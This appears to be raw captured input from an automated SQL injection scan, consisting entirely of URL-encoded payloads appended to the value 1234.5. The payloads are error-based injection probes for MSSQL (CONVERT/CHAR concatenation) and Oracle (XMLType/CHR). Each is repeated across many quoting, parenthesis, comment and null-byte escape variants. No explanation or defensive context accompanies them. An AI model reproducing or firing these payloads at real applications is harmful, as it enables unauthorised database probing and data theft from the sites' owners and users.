1234.5%27%7C%7C%28SELECT%20%27ZoVW%27%20FROM%20DUAL%20WHERE%201264%3D1264%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27qCpQ%27%20WHERE%206371%3D6371%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20pMfA%20WHERE%202777%3D2777%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27jrMB%27%20WHERE%208993%3D8993%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%23 1234.5%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%27%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%22%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%284620%3D4620 1234.5%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%289747%3D9747 1234.5%29%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%282276%3D2276 1234.5%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27szNo%27%3D%27szNo 1234.5%27%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27TbOz%27%3D%27TbOz 1234.5%27%29%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27nIqh%27%3D%27nIqh 1234.5%27%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27arLz%27%3D%27arLz 1234.5%27%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27scKG%27%20LIKE%20%27scKG 1234.5%27%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27aPmV%27%20LIKE%20%27aPmV 1234.5%27%29%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27syrZ%27%20LIKE%20%27syrZ 1234.5%27%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27azmJ%27%20LIKE%20%27azmJ 1234.5%22%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22uMAa%22%3D%22uMAa 1234.5%22%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22vODi%22%3D%22vODi 1234.5%22%29%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22LABh%22%3D%22LABh 1234.5%22%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22rnYF%22%3D%22rnYF 1234.5%22%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22YtLN%22%20LIKE%20%22YtLN 1234.5%22%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22IkrU%22%20LIKE%20%22IkrU 1234.5%22%29%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22CdvU%22%20LIKE%20%22CdvU 1234.5%22%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22gQqe%22%20LIKE%20%22gQqe 1234.5%25%27%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27eDxp%27%3D%27eDxp 1234.5%00%27%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27aspD%27%3D%27aspD 1234.5%27%29%20WHERE%201183%3D1183%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%22%29%20WHERE%207326%3D7326%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%29%20WHERE%202032%3D2032%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%27%20WHERE%204432%3D4432%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%22%20WHERE%205213%3D5213%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%20WHERE%207259%3D7259%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27JNaJ%27%20FROM%20DUAL%20WHERE%201705%3D1705%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27ueug%27%20WHERE%209054%3D9054%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20TQdz%20WHERE%204447%3D4447%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27WatS%27%20WHERE%203454%3D3454%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206603%20IN%20%28%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286603%3D6603%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%23 1234.5%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%22%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%288443%3D8443 1234.5%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%285532%3D5532 1234.5%29%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%282672%3D2672 1234.5%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27DRmB%27%3D%27DRmB 1234.5%27%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27uPzT%27%3D%27uPzT 1234.5%27%29%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27gbGx%27%3D%27gbGx 1234.5%27%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27mPDW%27%3D%27mPDW 